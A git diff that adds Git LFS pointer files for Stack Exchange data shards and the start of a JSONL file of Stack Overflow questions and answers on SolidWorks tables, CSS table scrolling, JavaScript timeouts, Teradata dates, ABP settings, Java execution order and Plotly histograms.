sha256:e1fb9e0a410668ca93ad8d78a36b923bf3a161307aee5815e919553d9f1a3476 +size 37829580 diff --git a/data/stackexchange/1-1/2257_2289.jsonl b/data/stackexchange/1-1/2257_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..17ce07a5c26f5ebbf7074e00ee91dfca9ee577e7 --- /dev/null +++ b/data/stackexchange/1-1/2257_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8588edc225700918270df48c5aba12e370dd9abc1e981722535be87a8c86c8e2 +size 37556537 diff --git a/data/stackexchange/1-1/2258_2289.jsonl b/data/stackexchange/1-1/2258_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..516fd2e24c0ec8979f587d91a2103e3c5d0de232 --- /dev/null +++ b/data/stackexchange/1-1/2258_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bfdc2e8d5c249e28a5a04b16bec2f0e9be0fac2e73a6d09777b4f430ff990448 +size 37306879 diff --git a/data/stackexchange/1-1/2259_2289.jsonl b/data/stackexchange/1-1/2259_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a79aa63f9e2edc24442ac3d4d7796b40729ae084 --- /dev/null +++ b/data/stackexchange/1-1/2259_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bbfda2b56f63d03c5ae65b46e5337af45fb67f83a05dd13305d87040ce51bcea +size 36899901 diff --git a/data/stackexchange/1-1/225_2289.jsonl b/data/stackexchange/1-1/225_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bd0045ce161076b4f6165f9b106db300367a1a12 --- /dev/null +++ b/data/stackexchange/1-1/225_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:15fcd33590fd4ba747521936566cfbd8b1142da1d3ddf994d7fc72dcedb56e8a +size 37161754 diff --git a/data/stackexchange/1-1/2260_2289.jsonl b/data/stackexchange/1-1/2260_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d0b44c959dae2dd1ade13700dd947b0361544c1b --- /dev/null +++ b/data/stackexchange/1-1/2260_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:19d78690666f22de11c29e42256f078d244901f5d00c37e4dfc8229530b4b107 +size 37340763 diff --git a/data/stackexchange/1-1/2261_2289.jsonl b/data/stackexchange/1-1/2261_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1a19af56066ce78fb5d5c99cd657d97f4943ade5 --- /dev/null +++ b/data/stackexchange/1-1/2261_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:53a0f9a4fa1d13512b0bcd46fa9461f4871b4140e9005e5dd9159e407b185940 +size 37189956 diff --git a/data/stackexchange/1-1/2262_2289.jsonl b/data/stackexchange/1-1/2262_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..ccbff678c68c44c11ac7713f6f672d5f93a62356 --- /dev/null +++ b/data/stackexchange/1-1/2262_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3ce44b33118257c2b09e9820dc839c58ecb4bdab8e7f874c4fc988e72a4a58cd +size 37476097 diff --git a/data/stackexchange/1-1/2263_2289.jsonl b/data/stackexchange/1-1/2263_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f44ce4524635cc5e6fe6acfc9085b1015f63e261 --- /dev/null +++ b/data/stackexchange/1-1/2263_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c1dfec3a2ce2bc8d464e849a4c9138e2cd47fd88566c8fed118c274e83360c9c +size 37427293 diff --git a/data/stackexchange/1-1/2264_2289.jsonl b/data/stackexchange/1-1/2264_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c2372f65a0dca6bccd7f214d3993f5c821cc2b4c --- /dev/null +++ b/data/stackexchange/1-1/2264_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7d5ff737ac827c0d90a8780c1d41a08dd8744a6bdb03d4b63b9a6f47ba033282 +size 37371509 diff --git a/data/stackexchange/1-1/2265_2289.jsonl b/data/stackexchange/1-1/2265_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..49be3234b32d99d9441b8ca69dd8689c13c33ee1 --- /dev/null +++ b/data/stackexchange/1-1/2265_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e0ef541553b5b64c59c61788faa484f739e74ada6820dfe8b7da7dcff096d438 +size 37369038 diff --git a/data/stackexchange/1-1/2266_2289.jsonl b/data/stackexchange/1-1/2266_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..de6599f2666722c98bfa0afae1793e2932f221a4 --- /dev/null +++ b/data/stackexchange/1-1/2266_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:43b76942505ca7b5d71ca26a7cc08bbe6e66f5f64cccf5c8bc1f82ae313e0ad4 +size 37635599 diff --git a/data/stackexchange/1-1/2267_2289.jsonl b/data/stackexchange/1-1/2267_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2bb499eff08e9c9211de9ef9bb4dd614e10e7f21 --- /dev/null +++ b/data/stackexchange/1-1/2267_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:797902b7f2d105a71548702cbb3debd774648a711e6f72252e223bc4888e10a0 +size 37659368 diff --git a/data/stackexchange/1-1/2268_2289.jsonl b/data/stackexchange/1-1/2268_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9df3f963164f8c67019b90cdeb20134c9e9e4dd1 --- /dev/null +++ b/data/stackexchange/1-1/2268_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:feee56dd21be9c9b85302ae04c4fc55f8702500d5072466f9f2afd68359f5e27 +size 38273243 diff --git a/data/stackexchange/1-1/2269_2289.jsonl b/data/stackexchange/1-1/2269_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..018ef9ffd0f9cb9bf8a1434773ebb111b3bb1383 --- /dev/null +++ b/data/stackexchange/1-1/2269_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8a44b46dc9ca7c9505bd113fcf8e7bf2e93ff4c17a3f5d4890dda18903eab8d5 +size 37726432 diff --git a/data/stackexchange/1-1/226_2289.jsonl b/data/stackexchange/1-1/226_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d5adc2c0abc1bc0b403ead651b9c2054b9e08c43 --- /dev/null +++ b/data/stackexchange/1-1/226_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:14d3ad383e740eec310e87089f863b239883a69dfc74b8967a93074148730636 +size 37133535 diff --git a/data/stackexchange/1-1/2270_2289.jsonl b/data/stackexchange/1-1/2270_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c5f4281f8df9c7018dedfe207816d2de92037665 --- /dev/null +++ b/data/stackexchange/1-1/2270_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6180544095babe48da063fd5f025f74e779daca42dfe80edee91405f78286ae7 +size 37658702 diff --git a/data/stackexchange/1-1/2271_2289.jsonl b/data/stackexchange/1-1/2271_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a0ec261da1bf34d8d69d1aa6b099164c11c703c2 --- /dev/null +++ b/data/stackexchange/1-1/2271_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:254c19897ee3563b7df1fa8fbb8b7978b79b3465085dd15583e3993880430be7 +size 37622526 diff --git a/data/stackexchange/1-1/2272_2289.jsonl b/data/stackexchange/1-1/2272_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1509a7d1a0905bc98af068bd56b90164ec2cb019 --- /dev/null +++ b/data/stackexchange/1-1/2272_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:14722ef705af7d78acede7180480548d542f079017d93f71b3668be7e42461ce +size 37156151 diff --git a/data/stackexchange/1-1/2273_2289.jsonl b/data/stackexchange/1-1/2273_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..81833b009f4d3611de61ce85845e52cc1afdb8ce --- /dev/null +++ b/data/stackexchange/1-1/2273_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:737f41bb55c6d516ebbbb989eee3f9ca18117a5830d87ff250ea8b206eb072d8 +size 38049330 diff --git a/data/stackexchange/1-1/2274_2289.jsonl b/data/stackexchange/1-1/2274_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..91b9d9e4d88500cd823a030b0cebe4c181c7bff1 --- /dev/null +++ b/data/stackexchange/1-1/2274_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a0a745cfb295b07271c597efd9e5e76c54268478ffbbaab1898b7d8b61bf6c6a +size 37507589 diff --git a/data/stackexchange/1-1/2275_2289.jsonl b/data/stackexchange/1-1/2275_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9da656dd25422bac07a3b97b8831596ffffa93c0 --- /dev/null +++ b/data/stackexchange/1-1/2275_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:694efff34e6d29b3585938b2df8e8be28d233921fee79a2b0c34b422b0dc8597 +size 37343115 diff --git a/data/stackexchange/1-1/2276_2289.jsonl b/data/stackexchange/1-1/2276_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3988dfae6b296a819ad9701fd272364520004de1 --- /dev/null +++ b/data/stackexchange/1-1/2276_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ce0fd1527ef4e299ae23d7b99509af4c4ff5d93d636f66840c4d7cbe47b44b53 +size 37749326 diff --git a/data/stackexchange/1-1/2277_2289.jsonl b/data/stackexchange/1-1/2277_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..efa748bc2b1fee7ee5bac1b2015e7d37f282bfee --- /dev/null +++ b/data/stackexchange/1-1/2277_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0b818325823a2f0950f8fd2a41ffef83f715c24e954856645497d58457dadacc +size 37557610 diff --git a/data/stackexchange/1-1/2278_2289.jsonl b/data/stackexchange/1-1/2278_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..ed15378b83b29c125d7d90e4c17fc3b2edca698f --- /dev/null +++ b/data/stackexchange/1-1/2278_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bfd1140d7fb5d656dba9fe067484a535a6c9aaed664d9ed9802a9a8cd8460fae +size 37192906 diff --git a/data/stackexchange/1-1/2279_2289.jsonl b/data/stackexchange/1-1/2279_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b10dfb13fa2502dbd7bccce2435694ef4645eaa5 --- /dev/null +++ b/data/stackexchange/1-1/2279_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b43426f867eaf622300f4a38a95f02da12dcd4d052acfc736507e2072c4331cc +size 37555749 diff --git a/data/stackexchange/1-1/227_2289.jsonl b/data/stackexchange/1-1/227_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d2a2582f47cf5a22d4800ca789ae02f9425413e7 --- /dev/null +++ b/data/stackexchange/1-1/227_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e54e5b97e5bcfd74d629b807496c60642beda257793ea9df73287fb44f272217 +size 37970292 diff --git a/data/stackexchange/1-1/2280_2289.jsonl b/data/stackexchange/1-1/2280_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..210f6e2237aa9c66325398b1ac1e761dd0d03fd8 --- /dev/null +++ b/data/stackexchange/1-1/2280_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:aeebb9da845ba4d31ec9427d8f5a60971781a06b5d10ccfb25992da23de45650 +size 36922695 diff --git a/data/stackexchange/1-1/2281_2289.jsonl b/data/stackexchange/1-1/2281_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..32868810f60f6fce026819dd09775883f5c2ad16 --- /dev/null +++ b/data/stackexchange/1-1/2281_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d7c18eface07543cd52a27f1a07cec1df85c6eebdedf5e7c40596529d81b5445 +size 37987139 diff --git a/data/stackexchange/1-1/2282_2289.jsonl b/data/stackexchange/1-1/2282_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..beb0c276c5d953111d2df2624455fc563ac0bc6b --- /dev/null +++ b/data/stackexchange/1-1/2282_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:04d3570ed778c92a26e6d7c2cfcec617c9628eadebc2094ab8d6087a39a979f8 +size 37861092 diff --git a/data/stackexchange/1-1/2283_2289.jsonl b/data/stackexchange/1-1/2283_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e28bbfd932cff3801fae01cd12b4b115acb7d424 --- /dev/null +++ b/data/stackexchange/1-1/2283_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:87d0e1a8457e47631b614b5e38ec0b7150140e7fa94ba8370d246cecae942025 +size 38075451 diff --git a/data/stackexchange/1-1/2284_2289.jsonl b/data/stackexchange/1-1/2284_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0d7318367146eb2a1ce510fe5e06029ffc36b01e --- /dev/null +++ b/data/stackexchange/1-1/2284_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:368e7b0e1dda1230e7d01fd78f1429c39544f545cc94212779cb4d92adfad0d7 +size 37660686 diff --git a/data/stackexchange/1-1/2285_2289.jsonl b/data/stackexchange/1-1/2285_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1d0efd68290946f178a8a64a2e382f4417777e39 --- /dev/null +++ b/data/stackexchange/1-1/2285_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:692cb2bb5eead20aab6f8ebb26a0b2f889336f4fa5ced709131ed13688192daf +size 37587209 diff --git a/data/stackexchange/1-1/2286_2289.jsonl b/data/stackexchange/1-1/2286_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..23fb3fbd7afc1a23e904c47eda8b8ca917408722 --- /dev/null +++ b/data/stackexchange/1-1/2286_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:66ea9dde0b73e60f83c717b27256df0fe3ebae97dc83ffcc1508a4e294217be7 +size 38096265 diff --git a/data/stackexchange/1-1/2287_2289.jsonl b/data/stackexchange/1-1/2287_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c97fd51637baffe2267e5b8dcf0d8dde1dfee7bb --- /dev/null +++ b/data/stackexchange/1-1/2287_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a56349caa133f9c0d0ec66ace23da3b1b3492c09649bd85eba21371110660ca2 +size 37267496 diff --git a/data/stackexchange/1-1/2288_2289.jsonl b/data/stackexchange/1-1/2288_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d5d11679c65d249c72d79480861b3052b139cae9 --- /dev/null +++ b/data/stackexchange/1-1/2288_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:46d11780ab5d5bed8ea5f5f8f9a29e44524c36da90dc058c774714793b8e8451 +size 37429977 diff --git a/data/stackexchange/1-1/2289_2289.jsonl b/data/stackexchange/1-1/2289_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..42c93d80b629bb8332c2dffa3adb61ba75b55c4f --- /dev/null +++ b/data/stackexchange/1-1/2289_2289.jsonl @@ -0,0 +1,816 @@ +{"text":"Set Column Property for a column in a revision table\n\nQuestion: I am trying to set column property for a column called \"description\". I tried using IRevisionTableAnnotation<\/code> and TableAnnotation<\/code> to identify the table and neither of them have a command that lets me set the column property. \nIRevisionTableAnnotation<\/code> does let me set a custom property through SetColumnCustomProperty<\/code>, but i want to set the column property given by default and not use custom column properties. \nIs there any way I can assign the column properties available by default?\nAnswer: setcolumntype2<\/code> attribute for TableAnnotation<\/code> will let you set the default properties for the table (Parameter to be entered in integer).\n","meta":{"source":"stackoverflow","title":"Set Column Property for a column in a revision table","dup_signals":{}},"subset":"stackexchange"} +{"text":"flexible table with tbody scrolling issues\n\nQuestion: I'm facing issue while I was make <\/code> scrollable. After I've made the <\/code> scrollable <\/code>'s <\/code> & <\/code>'s <\/code>s got misaligned. \nCan you help me on this\nMy HTML<\/code>:\n\n \n \n \n \n \n \n \n \n \n \n \n \n <\/code> and make your <\/code> scroll.\nFor this I'll recommend floatThead, viz I've used also for making the same.\nHere, I've created a JSFiddle, please have a look.\nThe main reason behind, misbehaving of your <\/code> elements is that you've declared:\ntable.scroll tbody, table.scroll thead {\n display: block;\n}\n<\/code>\n\n is a table-cell and as per CSS<\/code> its display:table-cell<\/code> and\n you've changed its behavior by altering its default property.\nComment: Yes it works with little error. I have added the FloatThread js file and called it. Now table header & body cell are aligned perfectly but Table Header is gone up while scroll action perform. It should be stick. I m using angularjs. 
I m not sure what i missed.\nThanks for your help :) I m looking forward to your reply\nComment: Can you create a **JSFiddle** as in mine there's no gone-up thing.\nComment: It works when i put js in the same html file, Previously i used to keep it on common js (separate js). So it wasn't work, Now it works\n\nAnd is it possible to create a directive for this in angular?\nComment: Unfortunately, I'm newbie to Angular :)\nComment: Ok No probs. Thanks for your help\n","meta":{"source":"stackoverflow","title":"flexible table with tbody scrolling issues","dup_signals":{}},"subset":"stackexchange"} +{"text":"Simple way to synchronously execute code after setTimout() code is done\n\nQuestion: I need a simple way to wait for setTimeout code to finish executing and then run the code that comes after setTimeout.\nNow the code after loop containing setTimout is executing before loop\/setTimout is finished executing.\nfor(let i = 0; i < 5; i++) {\n setTimeout(function(){\n console.log(i);\n }, i*1000);\n }\nconsole.log(\"loop\/timeout is done executing\");\n<\/code>\nComment: That's not how `setTimeout` works. See [Asynchronous vs synchronous execution, what does it really mean?](\/\/stackoverflow.com\/q\/748175)\nComment: Do you want *all* of the timeouts to complete first?\nComment: yes whole for loop then code bellow it.\nAnswer: setTimeout<\/code> is by definition not synchronous - whatever you use to solve the issue will have to be asynchronous, there's no way around that.\nThe best way to achieve something like this is to use Promise<\/code>s instead, calling Promise.all<\/code> on an array of the created promises:\n\n(async () => {\n await Promise.all(Array.from(\n { length: 5 },\n (_, i) => new Promise(res => setTimeout(() => {\n console.log(i);\n res();\n }, i * 1000))\n ));\n console.log(\"loop\/timeout is done executing\");\n})();<\/code>\n\nAlthough await<\/code> is awaiting a Promise, and Promises aren't synchronous, if you're want the code to look flat so you can have the final console.log<\/code> on the same indentation level as the main function block, this is probably the way to go.\nAnswer: you can define a function and call that function inside the timeout\n\n let currentForId = 0;\n for(let i = 0; i < 5; i++) {\n setTimeout(function(){\n console.log(i);\n if(++currentForId == 5)\n calling(\"message\");\n }, i*1000);\n }\n\n\n function calling(msg){\n console.log(msg);\n console.log(\"loop\/timeout is done executing\");\n }\n <\/code>\nComment: yeah, now you'll be calling `calling` 5 times - again, not what was asked :p\nComment: do you want all the timeouts to complete before printing ??\nComment: yes I like the simplicity of your answer but I want call the calling only once after the loop is done.\nComment: now you have one callback after all the timeouts iterated\nAnswer: The code\/message you need to run at the end of the count needs to be inside the for loop. Here's a simple way to achieve this.\n\nfor (let i = 0; i < 5; i++) {\n setTimeout(function () {\n console.log(i);\n if (i == 4) {\n console.log(\"loop\/timeout is done executing\");\n }\n }, i * 1000);\n}<\/code>\n","meta":{"source":"stackoverflow","title":"Simple way to synchronously execute code after setTimout() code is done","dup_signals":{}},"subset":"stackexchange"} +{"text":"Teradata String date to Date type change\n\nQuestion: I have a Teradata query which I am running using SAS. 
Once of the Teradata fields I am trying to read has a series of digits which is in string format that basically refers to a date.\nIn the Teradata Field the value is 170919 which mean 2017-09-19.\nI am unable to convert this value into a valid datetype.\nCan you please help.\nproc sql;\n connect to teradata (schema=&terasilo user=&terauser password=&terapass tdpid=&teradbase);\n create table COL_ASPECT_CALLS_2 as\n select * from connection to teradata(\n select \n top 10 *\n from &&terasilo..DMI_COL_ASPECT_CALLS \n where CAST(PROD_DATE_CH AS DATE FORMAT 'yymmdd')='2017-09-19'\n\n );\n disconnect from teradata; \nquit;\n<\/code>\nComment: Why don't you use `PROD_DATE_CH ='170919'` instead of CASTing the string to a date`\nComment: I cannot use it as I need to give a date range Eg: 170919 to 171231. String value will not be easy to increment just like date columns.\nComment: @Dipyaman Character string in YYMMDD format can be tested using inequalities, unlike strings in MDY or DMY order. You could use format in SAS to generate character strings from date values. For example to create a macro variable that you could use in your Teradata query: `%let nextmnth=%bquote('%sysfunc(intnx(month,&dateliteral,1,b),yymmddn6)');`. Once you have the string on the SAS side you can use INPUT function to convert it to a real date.\nAnswer: Instead of dealing with the century break setting or prepending 20<\/code> you can simply switch to To_Date('170919', 'yymmdd')<\/code> which always assumes 21st century for two-digit years.\nAnswer: I believe there is a system setting for Teradata that tells it how to convert 2 digit years. \nBut you could just add the century yourself. Perhaps just pre-pend '20'?\nselect\n CAST('170901' AS DATE FORMAT 'yymmdd') as NoCentury\n, CAST('20'||'170901' AS DATE FORMAT 'yymmdd') as WithCentury\n<\/code>\nYields\nNoCentury WithCentury\n9\/1\/1917 9\/1\/2017\n<\/code>\nComment: Thanks, this was helpful. The code was meant to access Teradata fields through SAS. So after converting the field into a date field and then to use that field in the where condition, it only accepted date in the format 'yyyymmdd' (20170901) as opposed to (9\/1\/2017).\nComment: @Dipyaman I am not sure if you are asking a question or making a statement? If you have a character field instead of the character literal in my example just use that `cast('20'||my_char_date as date format 'yymmdd') as my_real_date`. On the Teradata side you should be able to use date literals in the form `DATE'yyyy-mm-dd'`. On the SAS side you can attach any date format you want, but date literals require using DATE format like `'ddMONyyyy'd`.\n","meta":{"source":"stackoverflow","title":"Teradata String date to Date type change","dup_signals":{}},"subset":"stackexchange"} +{"text":"Load SettingDefinitionProvider with additional properties from database\n\nQuestion: I am using separate DB per Tenant. I ran into a scenario where I need to load the settings definitions from the DB. The reason for it is each Tenant can have its own default values. So I want to copy the default values over to the new tenants created by cloning the parent tenant DB and override the default values. However, I also want to update the other fields or add new columns ex: IsVisibleToClients can change per tenant and I cannot have this value in application code but instead want it in the DB\nIs this currently supported or a way to handle this\nAble to override the settings but looking to save all default values to DB. 
I believe this can be done by creating seeding scripts.\nAnd new tenants can be creating by cloning this DB and then override the default values. But how can I manage the fields like IsVisibleToClients per tenant and add other custom columns\nAnswer: Creating Custom Setting Value Providers is explained in Abp's own documentation, you can use it.(https:\/\/docs.abp.io\/en\/abp\/latest\/Settings#custom-setting-value-providers)\npublic class CustomSettingValueProvider : SettingValueProvider\n{\n public override string Name => \"Custom\";\n\n public CustomSettingValueProvider(ISettingStore settingStore) \n : base(settingStore)\n {\n }\n\n public override Task GetOrNullAsync(SettingDefinition setting)\n {\n \/* Return the setting value or null\n Use the SettingStore or another data source *\/\n }\n}\n<\/code>\nConfigure(options =>\n{\n options.ValueProviders.Add();\n});\n<\/code>\n","meta":{"source":"stackoverflow","title":"Load SettingDefinitionProvider with additional properties from database","dup_signals":{}},"subset":"stackexchange"} +{"text":"How does java read code?\n\nQuestion: Well, I was wondering how java handles code reading and running, for example if I wrote:\nstatic void doSomething(){\n doSomethingElse();\n doYetAnotherThing();\n}\n<\/code>\nWill it wait for doSomethingElse()<\/code> to complete before it runs doYetAnotherThing()<\/code>? Or will it just run both?\nI guess if it sets a variable, variable = setAVariable();<\/code> it will retrieve the variable before continuing, but if the method contains an infinite loop it would get stuck.\nComment: Yes it will wait for `doSomethingElse()` to complete before it runs `doYetAnotherThing()`.\nComment: @ThomasJungblut [Scala](http:\/\/www.scala-lang.org\/) has the concept of futures and promises built in to the language, and is based on the JVM. C# also now has the `async` and `await` keywords for asynchronous programming. I could see how some purely functional languages might have asynchronicity built even deeper into the language, but for imperative\/procedural programming, you really need to point out what can be run asynchronously and what to wait on for the code to make any sense.\nComment: Why don't you try it out for yourself, with a long-running `doSomethingElse` and a very fast `doYetAnotherThing` and see what happens?\nComment: Just out of interest, is there any asynchronous programming language that would run such statements concurrently \/ wait for future returns?\nComment: @TimS. Thanks, I wasn't aware that Scala allows it explicitly. The `async` keyword goes into the right direction. @UpAndAdam obviously you can construct something like that in every language, but I doubt its efficiency and readability. A better solution would need to formulate a graph of executions and synchronizations. Scala makes it easier, because the actor model is such a nice fit for async\/messaging computations.\nComment: @ThomasJungblut Never said it would be pretty :-p Tends to be slightly nicer at higher level languages. I've actually had to synthesize my own actor\/ action model to do just this on occasion. 
Had the 'users' write code in XML and I interpreted that into the target language..\nAnswer: Java will run your code sequentially unless u tell it otherwise (by creating threads.)\nIf you jave an infinite loop in function doSomthingElse() then doYetAnotherThing() will never execute and doSomething will never terminate.\npublic static void main(String[] args)\n{\n doSomethingElse();\n doYetAnotherThing();\n}\n\nprivate static void doYetAnotherThing() {\n System.out.println(\"Hi Agn\");\n\n}\n\nprivate static void doSomethingElse() {\n System.out.println(\"Hi\");\n while(true) \/\/ Infinite Loop\n {\n\n }\n}\n<\/code>\nThis will print to output:\n Hi\n<\/code>\nBut not: Hi Agn.\nFor making both functions run you need to remove the infinite loop in doSomethingElse().\nUPDATE: \nHowever if you cant do that and still want to run the code above, you can use threads:\nMain Class:\n public class javaworking \n {\n static MyThread t1, t2;\n Thread tc;\npublic static void main(String[] args)\n{\n t1 = new MyThread(1); \n Thread tc = new Thread(t1);\n tc.start();\n\n t2 = new MyThread(2);\n tc = new Thread(t2);\n tc.start();\n}\n}\n<\/code>\nThread class that contains all your functions:\n public class MyThread implements Runnable {\nint ch;\n\npublic MyThread(int choice)\n{\n ch = choice;\n}\n\n@Override\npublic void run() {\n \/\/ TODO Auto-generated method stub\n\n switch(ch)\n {\n case 1:\n doSomethingElse(); \n break;\n\n case 2:\n doYetAnotherThing();\n break;\n\n default:\n System.out.println(\"Illegal Choice\");\n break;\n }\n\n}\n\nprivate static void doYetAnotherThing() {\n \/\/ TODO Auto-generated method stub\n System.out.println(\"Hi Agn\");\n\n}\n\nprivate static void doSomethingElse() {\n \/\/ TODO Auto-generated method stub\n System.out.println(\"Hi\");\n int i = 1;\n while(true)\n {\n System.out.println(i++);\n }\n}\n}\n<\/code>\nPlease note: The code I provided is merely an example. I didn't do any error handling or follow the recommended standards. The code works and that's it.\nComment: And if i sart a new instance? Wil it still wait?\nComment: Not sure what you mean by start a new instance. Check my updated answer.\nAnswer: These are synchronous calls executing in one thread so they are executed one after the other, ie. first doSomethingElse();<\/code> then doYetAnotherThing();<\/code>. If you wanted them to be executed concurrently you could put each in different threads, then the order would not be guaranteed.\nAnswer: Logically the program will read top to bottom. And as a programmer that's all you really need to know. However, behind the scenes this may not necessarily be the case. But you're guaranteed the results as if they ran sequentially. \nSometimes your processor will run lines of code that should never even have been executed! This is because of something called branch prediction(which has a nice explanation on this answer, though not java the idea is demonstrated at a lower level).\nAgain, you can work under the assumption that everything in the same Thread, will execute in written order.\nAnswer: One listing from the spec is here:\nhttp:\/\/docs.oracle.com\/javase\/specs\/jls\/se5.0\/html\/execution.html\nThe gist is that one function must return before the next one is called. I can't say what that means in your case without knowing what your functions are doing. They could return because they finished or because they forked\/spawned off another process\/thread\/async action. 
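For illustration only, here is a minimal sketch (hypothetical method names, not taken from the question) of the difference between a call that returns because it finished and a call that returns after merely spawning the work onto another thread:\nstatic void runsSequentially() {\n    stepOne(); \/\/ must return before the next line runs\n    stepTwo(); \/\/ starts only after stepOne() has returned\n}\n\nstatic void returnsEarly() {\n    \/\/ this call returns almost immediately, but the work it started\n    \/\/ keeps running on another thread in the background\n    new Thread(() -> stepOne()).start();\n    stepTwo(); \/\/ may run before, during or after stepOne() finishes\n}\n\nstatic void stepOne() { System.out.println(\"one\"); }\nstatic void stepTwo() { System.out.println(\"two\"); }\n<\/code>\nIn both cases the caller regains control as soon as the method returns; whether the work is actually done at that point is a separate question. 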
There are more subtleties to this but I'm not getting into anything further than this since they over complicate and obfuscate the answer. \nBased on the terminology you use, I would suggest starting with a tutorial. Java doesn't read your code. Java is a language. The compiler will 'read' and parse your code, and generate bytecode that will be executed by the JVM.\nAnd yes, if you cause an infinite loop it's a problem and your program won't exit.\n","meta":{"source":"stackoverflow","title":"How does java read code?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Plotly: How to add text labels to a histogram?\n\nQuestion: Is there a way how to display the counted value of the histogram aggregate in the Plotly.Express histogram?\npx.histogram(pd.DataFrame({\"A\":[1,1,1,2,2,3,3,3,4,4,4,5]}),x=\"A\")<\/code>\n\nIf I would use regular histogram, I can specify text<\/code> parameter which direct to the column which contain the value to display.\npx.bar(pd.DataFrame({\"val\":[1,2,3,4,5], \"height\": [3,2,3,3,1]}), x=\"val\", y=\"height\", text=\"height\")<\/code>\n\nBut with histograms, this value is calculated and it's not even part of the fig.to_dict()<\/code>. Is there a way to add the text labels into histogram?\nUsing the answers below, I've summarized the finding to an article - 